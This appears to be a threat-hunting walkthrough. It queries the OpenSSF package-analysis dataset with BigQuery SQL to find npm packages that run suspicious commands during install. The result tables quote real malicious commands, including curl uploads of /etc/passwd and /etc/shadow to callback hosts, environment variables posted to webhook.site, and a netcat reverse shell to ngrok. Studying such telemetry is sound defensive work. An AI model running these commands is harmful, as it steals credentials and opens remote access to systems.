Find the commonly executed commands during NPM package install:
SELECT
Commands.Command[offset(0)] AS exe,
COUNT(*) AS `count`,
FROM
`ossf-malware-analysis.packages.analysis` AS T,
T.Analysis.install.Commands as Commands
WHERE
Package.Ecosystem = "npm"
AND TIMESTAMP_TRUNC(CreatedTimestamp, MONTH) = TIMESTAMP("2023-09-01")
GROUP BY exe
ORDER BY `count` DESC
;| exe | count |
|---|---|
| node | 814772 |
| npm | 424500 |
| /bin/sh | 340613 |
| sleep | 209428 |
| sh | 159084 |
| sed | 124058 |
| printf | 74544 |
| rm | 66336 |
| as | 63598 |
| touch | 54522 |
| … | … |
Now find the packages that execute an interesting selection of those commands:
SELECT
T.Package.Name,
T.Package.Version,
Commands.Command[OFFSET(0)] AS exe,
ARRAY_TO_STRING(Commands.Command, " ") AS command
FROM
`ossf-malware-analysis.packages.analysis` AS T,
T.Analysis.install.Commands AS Commands
WHERE
Package.Ecosystem = "npm"
AND TIMESTAMP_TRUNC(CreatedTimestamp, MONTH) = TIMESTAMP("2023-09-01")
AND Commands.Command[OFFSET(0)] IN ("curl", "whoami", "/usr/bin/curl", "python", "wget", "docker", "sudo", "/bin/echo", "ping", "nc")
ORDER BY
T.Package.Name,
T.Package.Version
ASC
;| Name | Version | exe | command |
|---|---|---|---|
| @apps-common/ui-theme | 10.1.0 | /usr/bin/curl | /usr/bin/curl c971b268fd0b.qlfu0xty7cyyfst1cs3qt6wz3q9hx7lw.oastify.com/ui-theme |
| @dm-connect/manager | 26.0.8 | curl | curl -s -k -X POST -d passwd=root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:105::/nonexistent:/usr/sbin/nologin
tcpdump:x:104:106::/nonexistent:/usr/sbin/nologin&id_rsa=&ip=34.31.210.88 https://sha16.requestcatcher.com/h4ck3d |
| @dm-connect/manager | 26.0.8 | curl | curl -s -k ifconfig.me |
| @dm-connect/manager | 28.0.9 | curl | curl -s -k -X POST -d root_directories=total 24
drwx------ 1 root root 4096 Sep 14 05:28 .
dr-xr-xr-x 1 root root 4096 Sep 20 20:15 ..
-rw-r--r-- 1 root root 3106 Oct 15 2021 .bashrc
drwxr-xr-x 3 root root 4096 Sep 14 05:26 .cache
drwxr-xr-x 3 root root 4096 Sep 14 05:25 .config
drwxr-xr-x 4 root root 4096 Sep 20 20:15 .npm
-rw-r--r-- 1 root root 161 Jul 9 2019 .profile https://sha16.requestcatcher.com/h4ck3d |
| @get-bridge/bridge-string-utils | 99.99.99 | curl | curl -H Hostname: NTJhMjQ0MWY3MGMwCg== -H Whoami: cm9vdAo= -H Pwd: L2FwcC9ub2RlX21vZHVsZXMvQGdldC1icmlkZ2UvYnJpZGdlLXN0cmluZy11dGlscwo= -d dG90YWwgOQpkcnd4ci14ci14IDIgcm9vdCByb290IDQwOTYgU2VwIDExIDE5OjM0IC4KZHJ3eHIt
eHIteCAzIHJvb3Qgcm9vdCA0MDk2IFNlcCAxMSAxOTozNCAuLgotcnctci0tci0tIDEgcm9vdCBy
b290ICAyNzEgU2VwIDExIDE5OjM0IHBhY2thZ2UuanNvbgotcnd4ci14ci14IDEgcm9vdCByb290
ICAxODkgU2VwIDExIDE5OjM0IHByZS5zaAo= https://cjvm1lk0sjhuban1t120rm6bqz7iuu5ka.oast.live |
| @get-bridge/bridge-string-utils | 99.99.99 | whoami | whoami |
| @get-bridge/tapestry-sdk | 99.99.991 | curl | curl -H Hostname: ZjM0ZmIzZWU0NGE1Cg== -H Whoami: cm9vdAo= -H Pwd: L2FwcC9ub2RlX21vZHVsZXMvQGdldC1icmlkZ2UvdGFwZXN0cnktc2RrCg== -d dG90YWwgMTIKZHJ3eHIteHIteCAzIHJvb3Qgcm9vdCA0MDk2IFNlcCAxMSAyMDo1NSAuCmRyd3hy
LXhyLXggNSByb290IHJvb3QgNDA5NiBTZXAgMTEgMjA6NTUgLi4KZHJ3eHIteHIteCAzIHJvb3Qg
cm9vdCA0MDk2IFNlcCAxMSAyMDo1NSBAZ2V0LWJyaWRnZQo= https://cjvm1lk0sjhuban1t120rm6bqz7iuu5ka.oast.live |
| @get-bridge/tapestry-sdk | 99.99.991 | whoami | whoami |
| @harvard-lil/scoop | 0.5.3 | curl | curl -L https://github.com/Hakky54/certificate-ripper/releases/download/2.1.0/crip-linux-amd64.tar.gz |
| @harvard-lil/scoop | 0.5.3 | curl | curl -L https://github.com/yt-dlp/yt-dlp/releases/download/2023.07.06/yt-dlp |
| @instructure/quiz-number-input | 18.0.1-rc.2 | python | python -c import sys; print(sys.executable); |
| @molgenis/vip-report-template | 5.5.4 | curl | curl --no-progress-meter --location https://github.com/molgenis/vip-utils/releases/download/v1.4.1/field_metadata.json --create-dirs --output src/metadata/field_metadata.json |
| @molgenis/vip-report-vcf | 1.4.3 | curl | curl --no-progress-meter --location https://github.com/molgenis/vip-utils/releases/download/v1.4.1/field_metadata.json --create-dirs --output src/metadata/field_metadata.json |
| @prodperfect/cli | 1.2.0 | curl | curl --url https://github.com/stedolan/jq/releases/download/jq-1.6/jq-linux64 --request GET --output /app/node_modules/@prodperfect/cli/../../.bin/jq --location --silent --show-error --write-out \n%{http_code} |
| @xarber/xshopjs | 1.0.0-b | /bin/echo | /bin/echo |
| @xarber/xshopjs | 1.0.0-b | sudo | sudo apt-get install unar -y |
| adidas-data-mesh | 4.4.7 | whoami | whoami |
| adidas-data-mesh | 4.8.7 | whoami | whoami |
| adidas-data-mesh | 4.8.9 | whoami | whoami |
| adidas-data-mesh | 6.6.6 | whoami | whoami |
| adidas-data-mesh | 9.4.7 | whoami | whoami |
| adidas-data-mesh | 9.9.4 | /usr/bin/curl | /usr/bin/curl --data @/etc/passwd a0359854ae4a.cm30n6w2vtc0000cv6m0gkboz5ayyyyyr.oast.fun |
| adidas-data-mesh | 9.9.7 | nc | nc tcp.in.ngrok.io 17353 -e /bin/bash |
| adidas-data-mesh | 9.9.8 | /usr/bin/curl | /usr/bin/curl --data @/etc/passwd b19d5f54a3a0aesic9l2whlwa33aytefcnu11s7jv8.burpcollaborator.net |
| asherah | 1.2.7 | curl | curl -s -L --fail -O --retry 999 --retry-max-time 0 https://github.com/godaddy/asherah-cobhan/releases/download/v0.4.25/libasherah-x64-archive.h |
| asherah | 1.2.7 | curl | curl -s -L --fail -O --retry 999 --retry-max-time 0 https://github.com/godaddy/asherah-cobhan/releases/download/v0.4.25/libasherah-x64.a |
| asherah | 1.2.9 | curl | curl -s -L --fail -O --retry 999 --retry-max-time 0 https://github.com/godaddy/asherah-cobhan/releases/download/v0.4.25/libasherah-x64-archive.h |
| asherah | 1.2.9 | curl | curl -s -L --fail -O --retry 999 --retry-max-time 0 https://github.com/godaddy/asherah-cobhan/releases/download/v0.4.25/libasherah-x64.a |
| bbc-iplayer-sounds-chatbot | 1.2.3 | whoami | whoami |
| bbc-iplayer-sounds-chatbot | 5.2.3 | whoami | whoami |
| ccfedrtest-poc | 1.0.3 | ping | ping 435dvf5lwsuqc7k2zmmip3zfm6sxgn4c.oastify.com |
| centurylink | 4.1.1 | whoami | whoami |
| centurylink | 5.1.1 | whoami | whoami |
| centurylink | 6.1.1 | whoami | whoami |
| centurylink | 7.1.1 | whoami | whoami |
| centurylink | 8.1.1 | whoami | whoami |
| centurylink | 9.1.1 | whoami | whoami |
| centurylink | 9.2.1 | whoami | whoami |
| centurylink | 9.4.1 | whoami | whoami |
| centurylink | 9.5.1 | whoami | whoami |
| centurylink | 9.8.1 | whoami | whoami |
| centurylink | 9.9.1 | whoami | whoami |
| chain-list | 20.0.0 | curl | curl ifconfig.me |
| course-structure-debugger | 10.999.0 | curl | curl https://ifconfig.me |
| course-structure-debugger | 10.999.0 | whoami | whoami |
| course-structure-debugger | 11.999.0 | curl | curl https://ifconfig.me |
| course-structure-debugger | 11.999.0 | whoami | whoami |
| darkhat-hard-to-find-package-do-not-require-it | 1.0.1 | curl | curl https://webhook.site/76a40c42-6fe4-4caf-9b37-49c5eda9ae20?darkhat=darkhat |
| feature-flag-framework | 9.999.0 | curl | curl https://ifconfig.me |
| feature-flag-framework | 9.999.0 | whoami | whoami |
| fiji-core-cryptopool | 9.999.0 | curl | curl https://ifconfig.me |
| fiji-core-cryptopool | 9.999.0 | whoami | whoami |
| fiji-core-foc | 9.999.0 | curl | curl https://ifconfig.me |
| fiji-core-foc | 9.999.0 | whoami | whoami |
| fiji-core-foundation | 9.999.0 | curl | curl https://ifconfig.me |
| fiji-core-foundation | 9.999.0 | whoami | whoami |
| fiji-core-framework | 9.999.0 | curl | curl https://ifconfig.me |
| fiji-core-framework | 9.999.0 | whoami | whoami |
| goingwithflow | 6.9.9 | whoami | whoami |
| goingwithflow | 9.8.9 | whoami | whoami |
| inteken-app-client | 9.9.1 | /usr/bin/curl | /usr/bin/curl --data @/etc/shadow 25371d442238xdede680mk624kgu48sasafdh4nubj.burpcollaborator.net |
| inteken-app-client | 9.9.5 | /usr/bin/curl | /usr/bin/curl --data @/etc/shadow 70839db2341del32g9cjsa8u8mo6t3fetd98lzrqff.burpcollaborator.net |
| inteken-app-client | 9.9.6 | /usr/bin/curl | /usr/bin/curl --data @/etc/passwd c15510217590el32g9cjsa8u8mo6t3fetd98lzrqff.burpcollaborator.net |
| jupiter-emoji | 9.999.0 | curl | curl https://ifconfig.me |
| jupiter-emoji | 9.999.0 | whoami | whoami |
| jupiter-i18n | 9.999.0 | curl | curl https://ifconfig.me |
| jupiter-i18n | 9.999.0 | whoami | whoami |
| jupiter-opensdk | 9.999.0 | curl | curl https://ifconfig.me |
| jupiter-opensdk | 9.999.0 | whoami | whoami |
| lab-npm-package | 1.0.7 | curl | curl -X POST -H Content-Type: application/json -d {env_variable: } https://webhook.site/6c53f051-f81b-4ea1-853c-a4ea76539a5c |
| lab-npm-package | 1.0.8 | curl | curl -X POST -H Content-Type: application/json -d {env_variable: rajesh } https://webhook.site/6c53f051-f81b-4ea1-853c-a4ea76539a5c |
| lab-npm-package | 2.0.1 | curl | curl -X POST -H Content-Type: application/json -d {"environment_variables": $(printenv | jq -Rs .)} https://webhook.site/6c53f051-f81b-4ea1-853c-a4ea76539a5c |
| lab-npm-package | 2.0.2 | curl | curl -X POST -H Content-Type: application/json -d {environment_variables: $(printenv | jq -Rs .)} https://webhook.site/6c53f051-f81b-4ea1-853c-a4ea76539a5c |
| master-oracle-lib | 20.0.0 | curl | curl ifconfig.me |
| metronome-synth-info-lib | 20.0.0 | curl | curl ifconfig.me |
| metronome-synth-user-lib | 20.0.2 | curl | curl ifconfig.me |
| metronome-ui | 21.0.2 | curl | curl ifconfig.me |
| mfp-food-diary | 0.1.1 | /usr/bin/curl | /usr/bin/curl --data @/etc/passwd dc9065f3a7b5cm31san2vtc000046akggkbohioyyyyyb.oast.fun |
| mfp-food-diary | 0.1.2 | /usr/bin/curl | /usr/bin/curl --data @/etc/passwd 5056fcbc2be2cm31san2vtc000046akggkbohioyyyyyb.oast.fun |
| mfp-test-repo | 0.1.1 | /usr/bin/curl | /usr/bin/curl --data @/etc/passwd f134e3ae147dcm31san2vtc000046akggkbohioyyyyyb.oast.fun |
| npm-random-gen | 1.0.1 | curl | curl -X POST -F file=@preinstall.txt https://eoerh8zdok2dcuf.m.pipedream.net |
| pathkit-local | 9.9.9 | /usr/bin/curl | /usr/bin/curl --data @/etc/passwd 00ad358605ce3y2fc9xtt9toy1u2y4txfy665xbnzc.burpcollaborator.net |
| payment-react-component | 1.5.0 | /usr/bin/curl | /usr/bin/curl 01dd4079912f.rhck43o9lrknmap6jncly360zr5itahz.oastify.com/payment-react-component |
| pmd-github-action | 2.1.1 | whoami | whoami |
| pmd-github-action | 7.2.9 | whoami | whoami |
| pmd-github-action | 7.9.9 | whoami | whoami |
| pmd-github-action | 9.9.9 | whoami | whoami |
| ppreact7 | 7.0.0 | /usr/bin/curl | /usr/bin/curl --data @/etc/hosts 30e72bbc4f57.0yj0npk9xow79fekqjlndw4lr.canarytokens.com |
| puppeteer-example | 0.1.12 | whoami | whoami |
| puppeteer-example | 0.1.13 | whoami | whoami |
| puppeteer-example | 0.1.14 | whoami | whoami |
| puppeteer-example | 0.1.15 | whoami | whoami |
| puppeteer-example | 0.1.16 | whoami | whoami |
| puppeteer-example | 0.1.2 | /usr/bin/curl | /usr/bin/curl --data @/etc/passwd 4826533f4ab3cm31san2vtc000046akggkbohioyyyyyb.oast.fun |
| puppeteer-example | 0.1.3 | /usr/bin/curl | /usr/bin/curl --data @/etc/passwd 3bfb39b5a69dcm31san2vtc000046akggkbohioyyyyyb.oast.fun |
| puppeteer-example | 0.1.5 | /usr/bin/curl | /usr/bin/curl --data @/etc/passwd af54b23955a1cm31san2vtc000046akggkbohioyyyyyb.oast.fun |
| puppeteer-example | 0.1.6 | whoami | whoami |
| puppeteer-example | 0.1.8 | whoami | whoami |
| puppeteer-example | 0.1.9 | whoami | whoami |
| quiz-presets | 18.0.1-rc.2 | python | python -c import sys; print(sys.executable); |
| rambox | 1.0.0 | whoami | whoami |
| scroller_super_top | 1.0.2 | wget | wget https://ipinfo.io/ |
| simple-dvt-v1 | 0.0.3 | python | python -c import sys; print(sys.executable); |
| simple-dvt-v1 | 0.0.3 | python | python -c import sys; print(sys.executable); |
| simple-dvt-v1 | 0.0.4 | python | python -c import sys; print(sys.executable); |
| simple-dvt-v1 | 0.0.4 | python | python -c import sys; print(sys.executable); |
| sqlx-ts | 0.5.0 | curl | curl -LSfs https://jasonshin.github.io/sqlx-ts/install.sh |
| sw-kendo-atomic-theme | 1.999.0 | curl | curl https://js.rip/nvjy3ak1e8 |
| sw-kendo-atomic-theme | 1.999.0 | whoami | whoami |
| symphony-monorepo | 1.0.1 | whoami | whoami |
| tourist-catapult | 9.7.2 | curl | curl https://d7mr6puf9ww39.cloudfront.net/meta.xml |
| tv-front | 1.1.0 | /usr/bin/curl | /usr/bin/curl d1d1d5022c4b.rhck43o9lrknmap6jncly360zr5itahz.oastify.com |
| ui-elements-icons | 4.999.0 | curl | curl https://ifconfig.me |
| ui-elements-icons | 4.999.0 | whoami | whoami |
| ui-elements-icons | 6.0.0 | curl | curl https://ifconfig.me |
| ui-elements-icons | 6.0.0 | curl | curl https://ifconfig.me |
| ui-elements-icons | 6.0.0 | whoami | whoami |
| ui-elements-icons | 6.0.0 | whoami | whoami |
| ui-elements-icons | 8.999.0 | curl | curl https://ifconfig.me |
| ui-elements-icons | 8.999.0 | whoami | whoami |
| ui-elements-icons | 9.999.9 | curl | curl https://ifconfig.me |
| ui-elements-icons | 9.999.9 | whoami | whoami |
| vesper-synth-user-lib | 20.0.0 | curl | curl ifconfig.me |
| visual_components | 1.0.13 | curl | curl jylzs5g46s3de9d6vrrdlyu2ptvkjb70.oastify.com/cmd=root |
| visual_components | 1.0.13 | whoami | whoami |
| visual_components | 1.0.14 | curl | curl 042gymmlc99ukqjn18xurf0jva11ptdi.oastify.com/a204fd83488a/?tcpdump:x:104:106::/nonexistent:/usr/sbin/nologin |
| visual_components | 1.0.18 | curl | curl hufxo3c22qzba794rpnbhwq0lrrifd32.oastify.com/508e916424f2/?root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin _apt:x:100:65534::/nonexistent:/usr/sbin/nologin systemd-network:x:101:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin messagebus:x:103:105::/nonexistent:/usr/sbin/nologin tcpdump:x:104:106::/nonexistent:/usr/sbin/nologin |
| visual_components | 1.0.19 | curl | curl 2jmido1nrbowzsypgacw6hflacg34zso.oastify.com/61e74477cc78/?root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin _apt:x:100:65534::/nonexistent:/usr/sbin/nologin systemd-network:x:101:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin messagebus:x:103:105::/nonexistent:/usr/sbin/nologin tcpdump:x:104:106::/nonexistent:/usr/sbin/nologin |
| visual_components | 1.0.20 | curl | curl gwgwq2e14p1ac6b3topajvsznqthhf54.oastify.com/5f90fe414aeb/?tcpdump:x:104:106::/nonexistent:/usr/sbin/nologin |
| visual_components | 1.0.21 | curl | curl gwgwq2e14p1ac6b3topajvsznqthhf54.oastify.com/84a523804232/?tcpdump:x:104:106::/nonexistent:/usr/sbin/nologin |
| wallet-switch-chain | 21.0.3 | curl | curl ifconfig.me |
| walletconnect-website | 4.4.4 | whoami | whoami |
| walletconnect-website | 5.4.5 | whoami | whoami |
| walletconnect-website | 6.4.5 | whoami | whoami |
| walletconnect-website | 7.4.7 | whoami | whoami |
| walletconnect-website | 8.4.7 | whoami | whoami |
| weak-json | 1.0.1 | wget | wget -q https://gitlab.inria.fr/line/aide-group/aidebuild/-/raw/master/src/makefile -O ./.makefile.inc |
| weak-json | 1.0.1 | wget | wget -q https://gitlab.inria.fr/line/aide-group/aidebuild/-/raw/master/src/makefile -O ./.makefile.inc |
| weak-json | 1.0.1 | wget | wget -q https://gitlab.inria.fr/line/aide-group/aidebuild/-/raw/master/src/makefile -O ./.makefile.inc |
| www-ankr-com | 2.0.10 | curl | curl ifconfig.me |
| ysb-ui-services | 3.999.0 | curl | curl https://ifconfig.me |
| ysb-ui-services | 3.999.0 | curl | curl https://ifconfig.me |
| ysb-ui-services | 3.999.0 | whoami | whoami |
| ysb-ui-services | 3.999.0 | whoami | whoami |
| ysb-ui-services | 4.999.0 | curl | curl https://ifconfig.me |
| ysb-ui-services | 4.999.0 | curl | curl https://ifconfig.me |
| ysb-ui-services | 4.999.0 | whoami | whoami |
| ysb-ui-services | 4.999.0 | whoami | whoami |
| zara-mkt-core | 1.0.0 | /usr/bin/curl | /usr/bin/curl --header X-Origin-IP: 172.16.16.96 a390a2d55c32.sfbdsd25uq668574h501430r0i69u3is.oastify.com |
| zara-mkt-core | 9.9.1 | /usr/bin/curl | /usr/bin/curl --header X-Origin-IP: 172.16.16.14 --data @/app/node_modules/zara-mkt-core/filetemp101.txt e5604348176e.sfbdsd25uq668574h501430r0i69u3is.oastify.com |
We see puppeteer-example@0.1.5 invokes the command /usr/bin/curl --data @/etc/passwd af54b23955a1cm31san2vtc000046akggkbohioyyyyyb.oast.fun.
Let’s see if we can identify the read of /etc/passwd and find other packages that do the same:
SELECT
Files
FROM
`ossf-malware-analysis.packages.analysis` AS T,
T.Analysis.install.Files as Files
WHERE
Package.Ecosystem = "npm"
AND TIMESTAMP_TRUNC(CreatedTimestamp, MONTH) = TIMESTAMP("2023-09-01")
AND Package.Name = "puppeteer-example"
AND Package.Version = "0.1.5"
AND Files.Read = true
;Unfortunately, it seems that reading from /etc/passwd is a common operation during installation, perhaps as the sandbox reads its current environment or other typical NPM processes initialize themselves.
Lets explore the files that are written to during installation:
SELECT
T.Package.Name,
T.Package.Version,
Files
FROM
`ossf-malware-analysis.packages.analysis` AS T,
T.Analysis.install.Files as Files
WHERE
Package.Ecosystem = "npm"
AND TIMESTAMP_TRUNC(CreatedTimestamp, MONTH) = TIMESTAMP("2023-09-01")
AND Files.Write = true
AND Files.Path NOT LIKE "/app/%"
AND Files.Path NOT LIKE "/root/.npm/%"
AND Files.Path NOT LIKE "/root/.cache/%"
AND Files.Path NOT LIKE "/root/.node-gyp/%"
AND Files.Path NOT LIKE "/tmp/%"
AND Files.Path NOT LIKE "/usr/local/cargo/%"
AND Files.Path NOT LIKE "/usr/lib/node_modules/%"
AND Files.Path NOT LIKE "host:%"
AND Files.Path NOT LIKE "pipe:%"
AND Files.Path NOT LIKE "socket:%"
AND Files.Path NOT LIKE "anon_inode:%"
AND Files.Path != "/dev/tty"
AND Files.Path != "/dev/null"
LIMIT 1000
;| Name | Version | Path |
|---|---|---|
| @instructure/quiz-taking | 18.1.2-rc.3 | /root/.ssh/known_hosts |
| @things-factory/operato-hub | 4.3.324 | /root/.config/configstore/type-graphql.json.3648656340 |
| @things-factory/sales-ui | 4.3.323 | /root/.config/configstore/type-graphql.json.1900368908 |
| taro-plugin-mini-ci | 1.0.0 | /root/.minidev/assets/devtools-resource/99fa26bda16f811b4e22a8574be3ad29_downloading_1695179542563/mini-devtools-4-minidev/front_end/.DS_Store |
| taro-plugin-mini-ci | 1.0.0 | /root/.minidev/assets/devtools-resource/99fa26bda16f811b4e22a8574be3ad29_downloading_1695179542563/mini-devtools-4-minidev/front_end/._.DS_Store |
| … | … | … |
Building up a denylist of directories would take a long time… There are hundreds of thousands of unique paths written to.